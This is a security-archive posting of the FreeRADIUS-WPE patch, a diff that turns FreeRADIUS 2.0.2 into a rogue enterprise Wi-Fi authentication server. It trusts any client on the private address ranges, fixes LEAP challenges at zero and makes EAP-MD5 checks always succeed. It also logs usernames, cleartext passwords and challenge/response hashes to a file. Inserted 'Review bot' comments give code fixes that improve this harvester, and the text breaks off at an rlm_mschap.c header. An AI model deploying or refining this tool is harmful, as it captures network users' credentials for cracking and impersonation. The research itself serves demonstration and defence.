
freeradius-wpe-2.0.2.patch.txt

Posted Feb 23, 2008

A patch for the popular open-source FreeRADIUS implementation that demonstrates RADIUS impersonation vulnerabilities, by Joshua Wright and Brad Antoniewicz, presented at Shmoocon 4.

tags | vulnerability, patch
systems | unix
MD5 | 6671917d602373d8010fe38de66377e4


diff -ru freeradius-server-2.0.2/raddb/clients.conf freeradius-server-2.0.2-wpe/raddb/clients.conf
--- freeradius-server-2.0.2/raddb/clients.conf 2008-02-13 04:41:14.000000000 -0500
+++ freeradius-server-2.0.2-wpe/raddb/clients.conf 2008-02-15 19:39:01.000000000 -0500
@@ -227,3 +227,20 @@
# secret = testing123
# }
#}
+
+client 192.168.0.0/16 {
+ secret = test
+ shortname = testAP
+}
+client 172.16.0.0/12 {
+ secret = test
+ shortname = testAP
+}
+client 10.0.0.0/8 {
+ secret = test
+ shortname = testAP
+}
+client 127.0.0.1 {
+ secret = test
+ shortname = testAP
+}
diff -ru freeradius-server-2.0.2/raddb/eap.conf freeradius-server-2.0.2-wpe/raddb/eap.conf
--- freeradius-server-2.0.2/raddb/eap.conf 2008-01-10 05:28:35.000000000 -0500
+++ freeradius-server-2.0.2-wpe/raddb/eap.conf 2008-02-15 19:37:35.000000000 -0500
@@ -1,428 +1,33 @@
-# -*- text -*-
-##
-## eap.conf -- Configuration for EAP types (PEAP, TTLS, etc.)
-##
-## $Id: eap.conf,v 1.23 2008/01/10 10:28:35 aland Exp $
-
-#######################################################################
-#
-# Whatever you do, do NOT set 'Auth-Type := EAP'. The server
-# is smart enough to figure this out on its own. The most
-# common side effect of setting 'Auth-Type := EAP' is that the
-# users then cannot use ANY other authentication method.
-#
-# EAP types NOT listed here may be supported via the "eap2" module.
-# See experimental.conf for documentation.
-#
eap {
- # Invoke the default supported EAP type when
- # EAP-Identity response is received.
- #
- # The incoming EAP messages DO NOT specify which EAP
- # type they will be using, so it MUST be set here.
- #
- # For now, only one default EAP type may be used at a time.
- #
- # If the EAP-Type attribute is set by another module,
- # then that EAP type takes precedence over the
- # default type configured here.
- #
- default_eap_type = md5
-
- # A list is maintained to correlate EAP-Response
- # packets with EAP-Request packets. After a
- # configurable length of time, entries in the list
- # expire, and are deleted.
- #
+ default_eap_type = peap
timer_expire = 60
-
- # There are many EAP types, but the server has support
- # for only a limited subset. If the server receives
- # a request for an EAP type it does not support, then
- # it normally rejects the request. By setting this
- # configuration to "yes", you can tell the server to
- # instead keep processing the request. Another module
- # MUST then be configured to proxy the request to
- # another RADIUS server which supports that EAP type.
- #
- # If another module is NOT configured to handle the
- # request, then the request will still end up being
- # rejected.
ignore_unknown_eap_types = no
-
- # Cisco AP1230B firmware 12.2(13)JA1 has a bug. When given
- # a User-Name attribute in an Access-Accept, it copies one
- # more byte than it should.
- #
- # We can work around it by configurably adding an extra
- # zero byte.
- cisco_accounting_username_bug = no
-
- # Supported EAP-types
-
- #
- # We do NOT recommend using EAP-MD5 authentication
- # for wireless connections. It is insecure, and does
- # not provide for dynamic WEP keys.
- #
+ cisco_accounting_username_bug = yes
md5 {
}
-
- # Cisco LEAP
- #
- # We do not recommend using LEAP in new deployments. See:
- # http://www.securiteam.com/tools/5TP012ACKE.html
- #
- # Cisco LEAP uses the MS-CHAP algorithm (but not
- # the MS-CHAP attributes) to perform it's authentication.
- #
- # As a result, LEAP *requires* access to the plain-text
- # User-Password, or the NT-Password attributes.
- # 'System' authentication is impossible with LEAP.
- #
leap {
}
-
- # Generic Token Card.
- #
- # Currently, this is only permitted inside of EAP-TTLS,
- # or EAP-PEAP. The module "challenges" the user with
- # text, and the response from the user is taken to be
- # the User-Password.
- #
- # Proxying the tunneled EAP-GTC session is a bad idea,
- # the users password will go over the wire in plain-text,
- # for anyone to see.
- #
gtc {
- # The default challenge, which many clients
- # ignore..
- #challenge = "Password: "
-
- # The plain-text response which comes back
- # is put into a User-Password attribute,
- # and passed to another module for
- # authentication. This allows the EAP-GTC
- # response to be checked against plain-text,
- # or crypt'd passwords.
- #
- # If you say "Local" instead of "PAP", then
- # the module will look for a User-Password
- # configured for the request, and do the
- # authentication itself.
- #
auth_type = PAP
}
-
- ## EAP-TLS
- #
- # See raddb/certs/README for additional comments
- # on certificates.
- #
- # If OpenSSL was not found at the time the server was
- # built, the "tls", "ttls", and "peap" sections will
- # be ignored.
- #
- # Otherwise, when the server first starts in debugging
- # mode, test certificates will be created. See the
- # "make_cert_command" below for details, and the README
- # file in raddb/certs
- #
- # These test certificates SHOULD NOT be used in a normal
- # deployment. They are created only to make it easier
- # to install the server, and to perform some simple
- # tests with EAP-TLS, TTLS, or PEAP.
- #
- # See also:
- #
- # http://www.dslreports.com/forum/remark,9286052~mode=flat
- #
tls {
- #
- # These is used to simplify later configurations.
- #
- certdir = ${confdir}/certs
- cadir = ${confdir}/certs
-
private_key_password = whatever
- private_key_file = ${certdir}/server.pem
-
- # If Private key & Certificate are located in
- # the same file, then private_key_file &
- # certificate_file must contain the same file
- # name.
- #
- # If CA_file (below) is not used, then the
- # certificate_file below MUST include not
- # only the server certificate, but ALSO all
- # of the CA certificates used to sign the
- # server certificate.
- certificate_file = ${certdir}/server.pem
-
- # Trusted Root CA list
- #
- # ALL of the CA's in this list will be trusted
- # to issue client certificates for authentication.
- #
- # In general, you should use self-signed
- # certificates for 802.1x (EAP) authentication.
- # In that case, this CA file should contain
- # *one* CA certificate.
- #
- # This parameter is used only for EAP-TLS,
- # when you issue client certificates. If you do
- # not use client certificates, and you do not want
- # to permit EAP-TLS authentication, then delete
- # this configuration item.
- CA_file = ${cadir}/ca.pem
-
- #
- # For DH cipher suites to work, you have to
- # run OpenSSL to create the DH file first:
- #
- # openssl dhparam -out certs/dh 1024
- #
- dh_file = ${certdir}/dh
- random_file = ${certdir}/random
-
- #
- # This can never exceed the size of a RADIUS
- # packet (4096 bytes), and is preferably half
- # that, to accomodate other attributes in
- # RADIUS packet. On most APs the MAX packet
- # length is configured between 1500 - 1600
- # In these cases, fragment size should be
- # 1024 or less.
- #
- # fragment_size = 1024
-
- # include_length is a flag which is
- # by default set to yes If set to
- # yes, Total Length of the message is
- # included in EVERY packet we send.
- # If set to no, Total Length of the
- # message is included ONLY in the
- # First packet of a fragment series.
- #
- # include_length = yes
-
- # Check the Certificate Revocation List
- #
- # 1) Copy CA certificates and CRLs to same directory.
- # 2) Execute 'c_rehash <CA certs&CRLs Directory>'.
- # 'c_rehash' is OpenSSL's command.
- # 3) uncomment the line below.
- # 5) Restart radiusd
- # check_crl = yes
- # CA_path = /path/to/directory/with/ca_certs/and/crls/
-
- #
- # If check_cert_issuer is set, the value will
- # be checked against the DN of the issuer in
- # the client certificate. If the values do not
- # match, the cerficate verification will fail,
- # rejecting the user.
- #
- # check_cert_issuer = "/C=GB/ST=Berkshire/L=Newbury/O=My Company Ltd"
-
- #
- # If check_cert_cn is set, the value will
- # be xlat'ed and checked against the CN
- # in the client certificate. If the values
- # do not match, the certificate verification
- # will fail rejecting the user.
- #
- # This check is done only if the previous
- # "check_cert_issuer" is not set, or if
- # the check succeeds.
- #
- # check_cert_cn = %{User-Name}
- #
- # Set this option to specify the allowed
- # TLS cipher suites. The format is listed
- # in "man 1 ciphers".
- cipher_list = "DEFAULT"
-
- #
-
- # This configuration entry should be deleted
- # once the server is running in a normal
- # configuration. It is here ONLY to make
- # initial deployments easier.
- #
- make_cert_command = "${certdir}/bootstrap"
- }
-
- # The TTLS module implements the EAP-TTLS protocol,
- # which can be described as EAP inside of Diameter,
- # inside of TLS, inside of EAP, inside of RADIUS...
- #
- # Surprisingly, it works quite well.
- #
- # The TTLS module needs the TLS module to be installed
- # and configured, in order to use the TLS tunnel
- # inside of the EAP packet. You will still need to
- # configure the TLS module, even if you do not want
- # to deploy EAP-TLS in your network. Users will not
- # be able to request EAP-TLS, as it requires them to
- # have a client certificate. EAP-TTLS does not
- # require a client certificate.
- #
- # You can make TTLS require a client cert by setting
- #
- # EAP-TLS-Require-Client-Cert = Yes
- #
- # in the control items for a request.
- #
+ private_key_file = ${raddbdir}/certs/server.pem
+ certificate_file = ${raddbdir}/certs/server.pem
+ CA_file = ${raddbdir}/certs/ca.pem
+ dh_file = ${raddbdir}/certs/dh
+ random_file = ${raddbdir}/certs/random
+ fragment_size = 1024
+ include_length = yes
+ }
ttls {
- # The tunneled EAP session needs a default
- # EAP type which is separate from the one for
- # the non-tunneled EAP module. Inside of the
- # TTLS tunnel, we recommend using EAP-MD5.
- # If the request does not contain an EAP
- # conversation, then this configuration entry
- # is ignored.
- default_eap_type = md5
-
- # The tunneled authentication request does
- # not usually contain useful attributes
- # like 'Calling-Station-Id', etc. These
- # attributes are outside of the tunnel,
- # and normally unavailable to the tunneled
- # authentication request.
- #
- # By setting this configuration entry to
- # 'yes', any attribute which NOT in the
- # tunneled authentication request, but
- # which IS available outside of the tunnel,
- # is copied to the tunneled request.
- #
- # allowed values: {no, yes}
- copy_request_to_tunnel = no
-
- # The reply attributes sent to the NAS are
- # usually based on the name of the user
- # 'outside' of the tunnel (usually
- # 'anonymous'). If you want to send the
- # reply attributes based on the user name
- # inside of the tunnel, then set this
- # configuration entry to 'yes', and the reply
- # to the NAS will be taken from the reply to
- # the tunneled request.
- #
- # allowed values: {no, yes}
- use_tunneled_reply = no
-
- #
- # The inner tunneled request can be sent
- # through a virtual server constructed
- # specifically for this purpose.
- #
- # If this entry is commented out, the inner
- # tunneled request will be sent through
- # the virtual server that processed the
- # outer requests.
- #
- #virtual_server = "inner-tunnel"
}
-
- ##################################################
- #
- # !!!!! WARNINGS for Windows compatibility !!!!!
- #
- ##################################################
- #
- # If you see the server send an Access-Challenge,
- # and the client never sends another Access-Request,
- # then
- #
- # STOP!
- #
- # The server certificate has to have special OID's
- # in it, or else the Microsoft clients will silently
- # fail. See the "scripts/xpextensions" file for
- # details, and the following page:
- #
- # http://support.microsoft.com/kb/814394/en-us
- #
- # For additional Windows XP SP2 issues, see:
- #
- # http://support.microsoft.com/kb/885453/en-us
- #
- # Note that we do not necessarily agree with their
- # explanation... but the fix does appear to work.
- #
- ##################################################
-
- #
- # The tunneled EAP session needs a default EAP type
- # which is separate from the one for the non-tunneled
- # EAP module. Inside of the TLS/PEAP tunnel, we
- # recommend using EAP-MS-CHAPv2.
- #
- # The PEAP module needs the TLS module to be installed
- # and configured, in order to use the TLS tunnel
- # inside of the EAP packet. You will still need to
- # configure the TLS module, even if you do not want
- # to deploy EAP-TLS in your network. Users will not
- # be able to request EAP-TLS, as it requires them to
- # have a client certificate. EAP-PEAP does not
- # require a client certificate.
- #
- #
- # You can make TTLS require a client cert by setting
- #
- # EAP-TLS-Require-Client-Cert = Yes
- #
- # in the control items for a request.
- #
- peap {
- # The tunneled EAP session needs a default
- # EAP type which is separate from the one for
- # the non-tunneled EAP module. Inside of the
- # PEAP tunnel, we recommend using MS-CHAPv2,
- # as that is the default type supported by
- # Windows clients.
+ peap {
default_eap_type = mschapv2
-
- # the PEAP module also has these configuration
- # items, which are the same as for TTLS.
copy_request_to_tunnel = no
use_tunneled_reply = no
-
- # When the tunneled session is proxied, the
- # home server may not understand EAP-MSCHAP-V2.
- # Set this entry to "no" to proxy the tunneled
- # EAP-MSCHAP-V2 as normal MSCHAPv2.
- # proxy_tunneled_request_as_eap = yes
-
- #
- # The inner tunneled request can be sent
- # through a virtual server constructed
- # specifically for this purpose.
- #
- # If this entry is commented out, the inner
- # tunneled request will be sent through
- # the virtual server that processed the
- # outer requests.
- #
- #virtual_server = "inner-tunnel"
+ proxy_tunneled_request_as_eap = yes
}
-
- #
- # This takes no configuration.
- #
- # Note that it is the EAP MS-CHAPv2 sub-module, not
- # the main 'mschap' module.
- #
- # Note also that in order for this sub-module to work,
- # the main 'mschap' module MUST ALSO be configured.
- #
- # This module is the *Microsoft* implementation of MS-CHAPv2
- # in EAP. There is another (incompatible) implementation
- # of MS-CHAPv2 in EAP by Cisco, which FreeRADIUS does not
- # currently support.
- #
mschapv2 {
}
}
diff -ru freeradius-server-2.0.2/raddb/radiusd.conf.in freeradius-server-2.0.2-wpe/raddb/radiusd.conf.in
--- freeradius-server-2.0.2/raddb/radiusd.conf.in 2008-02-13 09:21:05.000000000 -0500
+++ freeradius-server-2.0.2-wpe/raddb/radiusd.conf.in 2008-02-15 19:37:35.000000000 -0500
@@ -375,6 +375,7 @@

# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
+wpelogfile = ${logdir}/freeradius-server-wpe.log

# SECURITY CONFIGURATION
#
diff -ru freeradius-server-2.0.2/raddb/users freeradius-server-2.0.2-wpe/raddb/users
--- freeradius-server-2.0.2/raddb/users 2007-10-23 09:41:23.000000000 -0400
+++ freeradius-server-2.0.2-wpe/raddb/users 2008-02-15 19:37:35.000000000 -0500
@@ -1,203 +1,3 @@
-#
-# Please read the documentation file ../doc/processing_users_file,
-# or 'man 5 users' (after installing the server) for more information.
-#
-# This file contains authentication security and configuration
-# information for each user. Accounting requests are NOT processed
-# through this file. Instead, see 'acct_users', in this directory.
-#
-# The first field is the user's name and can be up to
-# 253 characters in length. This is followed (on the same line) with
-# the list of authentication requirements for that user. This can
-# include password, comm server name, comm server port number, protocol
-# type (perhaps set by the "hints" file), and huntgroup name (set by
-# the "huntgroups" file).
-#
-# If you are not sure why a particular reply is being sent by the
-# server, then run the server in debugging mode (radiusd -X), and
-# you will see which entries in this file are matched.
-#
-# When an authentication request is received from the comm server,
-# these values are tested. Only the first match is used unless the
-# "Fall-Through" variable is set to "Yes".
-#
-# A special user named "DEFAULT" matches on all usernames.
-# You can have several DEFAULT entries. All entries are processed
-# in the order they appear in this file. The first entry that
-# matches the login-request will stop processing unless you use
-# the Fall-Through variable.
-#
-# If you use the database support to turn this file into a .db or .dbm
-# file, the DEFAULT entries _have_ to be at the end of this file and
-# you can't have multiple entries for one username.
-#
-# Indented (with the tab character) lines following the first
-# line indicate the configuration values to be passed back to
-# the comm server to allow the initiation of a user session.
-# This can include things like the PPP configuration values
-# or the host to log the user onto.
-#
-# You can include another `users' file with `$INCLUDE users.other'
-#
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0

-#
-# For a list of RADIUS attributes, and links to their definitions,
-# see:
-#
-# http://www.freeradius.org/rfc/attributes.html
-#
-
-#
-# Deny access for a specific user. Note that this entry MUST
-# be before any other 'Auth-Type' attribute which results in the user
-# being authenticated.
-#
-# Note that there is NO 'Fall-Through' attribute, so the user will not
-# be given any additional resources.
-#
-#lameuser Auth-Type := Reject
-# Reply-Message = "Your account has been disabled."
-
-#
-# Deny access for a group of users.
-#
-# Note that there is NO 'Fall-Through' attribute, so the user will not
-# be given any additional resources.
-#
-#DEFAULT Group == "disabled", Auth-Type := Reject
-# Reply-Message = "Your account has been disabled."
-#
-
-#
-# This is a complete entry for "steve". Note that there is no Fall-Through
-# entry so that no DEFAULT entry will be used, and the user will NOT
-# get any attributes in addition to the ones listed here.
-#
-#steve Cleartext-Password := "testing"
-# Service-Type = Framed-User,
-# Framed-Protocol = PPP,
-# Framed-IP-Address = 172.16.3.33,
-# Framed-IP-Netmask = 255.255.255.0,
-# Framed-Routing = Broadcast-Listen,
-# Framed-Filter-Id = "std.ppp",
-# Framed-MTU = 1500,
-# Framed-Compression = Van-Jacobsen-TCP-IP
-
-#
-# This is an entry for a user with a space in their name.
-# Note the double quotes surrounding the name.
-#
-#"John Doe" Cleartext-Password := "hello"
-# Reply-Message = "Hello, %{User-Name}"
-
-#
-# Dial user back and telnet to the default host for that port
-#
-#Deg Cleartext-Password := "ge55ged"
-# Service-Type = Callback-Login-User,
-# Login-IP-Host = 0.0.0.0,
-# Callback-Number = "9,5551212",
-# Login-Service = Telnet,
-# Login-TCP-Port = Telnet
-
-#
-# Another complete entry. After the user "dialbk" has logged in, the
-# connection will be broken and the user will be dialed back after which
-# he will get a connection to the host "timeshare1".
-#
-#dialbk Cleartext-Password := "callme"
-# Service-Type = Callback-Login-User,
-# Login-IP-Host = timeshare1,
-# Login-Service = PortMaster,
-# Callback-Number = "9,1-800-555-1212"
-
-#
-# user "swilson" will only get a static IP number if he logs in with
-# a framed protocol on a terminal server in Alphen (see the huntgroups file).
-#
-# Note that by setting "Fall-Through", other attributes will be added from
-# the following DEFAULT entries
-#
-#swilson Service-Type == Framed-User, Huntgroup-Name == "alphen"
-# Framed-IP-Address = 192.168.1.65,
-# Fall-Through = Yes
-
-#
-# If the user logs in as 'username.shell', then authenticate them
-# using the default method, give them shell access, and stop processing
-# the rest of the file.
-#
-#DEFAULT Suffix == ".shell"
-# Service-Type = Login-User,
-# Login-Service = Telnet,
-# Login-IP-Host = your.shell.machine
-
-
-#
-# The rest of this file contains the several DEFAULT entries.
-# DEFAULT entries match with all login names.
-# Note that DEFAULT entries can also Fall-Through (see first entry).
-# A name-value pair from a DEFAULT entry will _NEVER_ override
-# an already existing name-value pair.
-#
-
-#
-# Set up different IP address pools for the terminal servers.
-# Note that the "+" behind the IP address means that this is the "base"
-# IP address. The Port-Id (S0, S1 etc) will be added to it.
-#
-#DEFAULT Service-Type == Framed-User, Huntgroup-Name == "alphen"
-# Framed-IP-Address = 192.168.1.32+,
-# Fall-Through = Yes
-
-#DEFAULT Service-Type == Framed-User, Huntgroup-Name == "delft"
-# Framed-IP-Address = 192.168.2.32+,
-# Fall-Through = Yes
-
-#
-# Sample defaults for all framed connections.
-#
-#DEFAULT Service-Type == Framed-User
-# Framed-IP-Address = 255.255.255.254,
-# Framed-MTU = 576,
-# Service-Type = Framed-User,
-# Fall-Through = Yes
-
-#
-# Default for PPP: dynamic IP address, PPP mode, VJ-compression.
-# NOTE: we do not use Hint = "PPP", since PPP might also be auto-detected
-# by the terminal server in which case there may not be a "P" suffix.
-# The terminal server sends "Framed-Protocol = PPP" for auto PPP.
-#
-DEFAULT Framed-Protocol == PPP
- Framed-Protocol = PPP,
- Framed-Compression = Van-Jacobson-TCP-IP
-
-#
-# Default for CSLIP: dynamic IP address, SLIP mode, VJ-compression.
-#
-DEFAULT Hint == "CSLIP"
- Framed-Protocol = SLIP,
- Framed-Compression = Van-Jacobson-TCP-IP
-
-#
-# Default for SLIP: dynamic IP address, SLIP mode.
-#
-DEFAULT Hint == "SLIP"
- Framed-Protocol = SLIP
-
-#
-# Last default: rlogin to our main server.
-#
-#DEFAULT
-# Service-Type = Login-User,
-# Login-Service = Rlogin,
-# Login-IP-Host = shellbox.ispdomain.com
-
-# #
-# # Last default: shell on the local terminal server.
-# #
-# DEFAULT
-# Service-Type = Administrative-User
-
-# On no match, the user is denied access.
+DEFAULT Cleartext-Password := "a"
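Review bot: The trailing `DEFAULT Cleartext-Password := "a"` entry at the end of this hunk can never be reached: the new first entry `DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0` also matches every user and carries no `Fall-Through = Yes`, so, per the header text this hunk removes ("The first entry that matches the login-request will stop processing unless you use the Fall-Through variable"), processing stops at the first DEFAULT. Either drop the second entry or add `Fall-Through = Yes` to the first if both are meant to apply; as written the second is dead configuration that will mislead the next reader.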
diff -ru freeradius-server-2.0.2/src/include/radiusd.h freeradius-server-2.0.2-wpe/src/include/radiusd.h
--- freeradius-server-2.0.2/src/include/radiusd.h 2008-02-11 10:19:54.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/include/radiusd.h 2008-02-15 19:37:35.000000000 -0500
@@ -247,6 +247,7 @@
#endif
char *log_file;
char *checkrad;
+ char *wpelogfile;
const char *pid_file;
rad_listen_t *listen;
int syslog_facility;
diff -ru freeradius-server-2.0.2/src/main/auth.c freeradius-server-2.0.2-wpe/src/main/auth.c
--- freeradius-server-2.0.2/src/main/auth.c 2007-12-10 11:07:30.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/main/auth.c 2008-02-15 19:37:35.000000000 -0500
@@ -319,6 +319,7 @@
return -1;
}
DEBUG2("auth: user supplied User-Password matches local User-Password");
+ log_wpe("password", request->username->vp_strvalue, password_pair->vp_strvalue, NULL, 0, NULL, 0);
break;

} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
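Review bot: `log_wpe()` is called here and in eap_leap.c, eap_md5.c, rlm_mschap.c and rlm_pap.c, but no hunk in this patch adds a prototype for it: the only header change (radiusd.h) adds the `wpelogfile` field, so every call site relies on an implicit declaration unless one exists somewhere outside the patch. A prototype next to that field, `void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen);`, keeps the pointer/`unsigned int` argument types checked at each caller. The enclosing function in auth.c begins and ends outside this hunk, so whether `request->username` is guaranteed non-NULL at this point cannot be confirmed from the visible lines; if it can be absent, `request->username->vp_strvalue` dereferences NULL.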
diff -ru freeradius-server-2.0.2/src/main/log.c freeradius-server-2.0.2-wpe/src/main/log.c
--- freeradius-server-2.0.2/src/main/log.c 2007-11-23 08:46:53.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/main/log.c 2008-02-15 19:37:35.000000000 -0500
@@ -28,6 +28,10 @@

#include <freeradius-devel/radiusd.h>

+#include <stdio.h>
+#include <time.h>
+
+
#ifdef HAVE_SYSLOG_H
# include <syslog.h>
/* keep track of whether we've run openlog() */
@@ -237,5 +241,52 @@
}


+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge,
+ unsigned int challen, unsigned char *response, unsigned int resplen)
+{
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (mainconfig.wpelogfile == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(mainconfig.wpelogfile, "a");
+ if (logfd == NULL) {
+ DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+ logfd = stderr;
+ }
+ }


+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ fprintf(logfd, "\n");
+ fclose(logfd);
+}
+
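Review bot: `fclose(logfd)` on the last line runs even when `logfd` was set to `stderr` (both the `wpelogfile == NULL` branch and the `fopen` failure fallback), which closes the process's stderr after the first such call and silently drops all later diagnostic output; guard it with `if (logfd != stderr) fclose(logfd);`. The debug message on the `fopen` failure path is prefixed `rlm_mschap:` although this function lives in log.c and is called from several modules, which will misdirect anyone reading the debug log. `ctime()` already terminates its string with a newline, so `"%s: %s\n"` emits an extra blank line, and `strerror`/`errno` need `<string.h>`/`<errno.h>`, which the include hunk above does not add (they may arrive via radiusd.h).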
diff -ru freeradius-server-2.0.2/src/main/mainconfig.c freeradius-server-2.0.2-wpe/src/main/mainconfig.c
--- freeradius-server-2.0.2/src/main/mainconfig.c 2008-01-21 05:29:02.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/main/mainconfig.c 2008-02-15 19:37:35.000000000 -0500
@@ -188,6 +188,7 @@
{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },

{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
+ { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },

{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
{ "security", PW_TYPE_SUBSECTION, 0, NULL, (const void *) security_config },
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2007-11-25 09:02:08.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2008-02-15 19:37:35.000000000 -0500
@@ -244,10 +244,11 @@
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session)
+ leap_session_t *session, char *username)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
+ unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };


/*
@@ -266,6 +267,7 @@
*/
eapleap_mschap(ntpwdhash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
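Review bot: The `challenge` passed to `log_wpe()` here is the all-zero local array declared in the previous hunk, not the challenge the verification actually used (`session->peer_challenge`, the argument to `eapleap_mschap()` two lines above). The two only agree because the third hunk in this file forces every issued challenge byte to 0; if that loop is ever changed, the log records a challenge that was never sent. Logging `session->peer_challenge` directly (assuming it is the 8-byte buffer `eapleap_mschap()` reads, which the hunk does not show) removes the duplicated constant and the coupling. `eapleap_stage4()` continues past the end of this hunk.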
@@ -415,7 +417,9 @@
* Fill the challenge with random bytes.
*/
for (i = 0; i < reply->count; i++) {
- reply->challenge[i] = fr_rand();
+ /* WPE - fixed challenge */
+ //reply->challenge[i] = fr_rand();
+ reply->challenge[i] = 0;
}

DEBUG2(" rlm_eap_leap: Issuing AP Challenge");
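Review bot: The original `reply->challenge[i] = fr_rand();` line is kept as a `//` comment beside its replacement rather than removed, and the same pattern recurs for every disabled check in this patch (eap_md5.c, the `do_mschap` comparison in rlm_mschap.c, and the six `/* WPE - always succeed */` blocks in rlm_pap.c). Commented-out code drifts from the live code and is invisible to the compiler; either delete it, since the diff already records what was removed, or wrap deliberately disabled blocks in `#if 0 ... #endif`, which is the conventional, greppable marker for that intent. The `//` comments also break the `/* */` style used on the surrounding lines of these files and are not valid C89 if the project still builds in that mode.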
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2006-11-14 16:22:09.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2008-02-15 19:37:35.000000000 -0500
@@ -68,7 +68,7 @@
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session);
+ leap_session_t *session, char *username);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2007-12-25 03:18:56.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2008-02-15 19:37:35.000000000 -0500
@@ -133,7 +133,7 @@
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
- rcode = eapleap_stage4(packet, password, session);
+ rcode = eapleap_stage4(packet, password, session, username);
session->stage = 6;

/*
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2007-11-23 07:58:12.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2008-02-15 19:37:35.000000000 -0500
@@ -202,9 +202,13 @@
/*
* The length of the response is always 16 for MD5.
*/
- if (memcmp(output, packet->value, 16) != 0) {
- return 0;
- }
+ //WPE - always succeed
+ //if (memcmp(output, packet->value, 16) != 0) {
+
+ //return 0;
+ //}
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16);
return 1;
}

diff -ru freeradius-server-2.0.2/src/modules/rlm_files/rlm_files.c freeradius-server-2.0.2-wpe/src/modules/rlm_files/rlm_files.c
--- freeradius-server-2.0.2/src/modules/rlm_files/rlm_files.c 2007-11-23 08:46:59.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_files/rlm_files.c 2008-02-15 19:37:35.000000000 -0500
@@ -463,6 +463,7 @@
default_pl = default_pl->next;
}

+ /* WPE - look for matching entries here */
if (paircompare(request, request_pairs, pl->check, reply_pairs) == 0) {
DEBUG2(" %s: Matched entry %s at line %d",
filename, match, pl->lineno);
diff -ru freeradius-server-2.0.2/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.0.2-wpe/src/modules/rlm_mschap/rlm_mschap.c
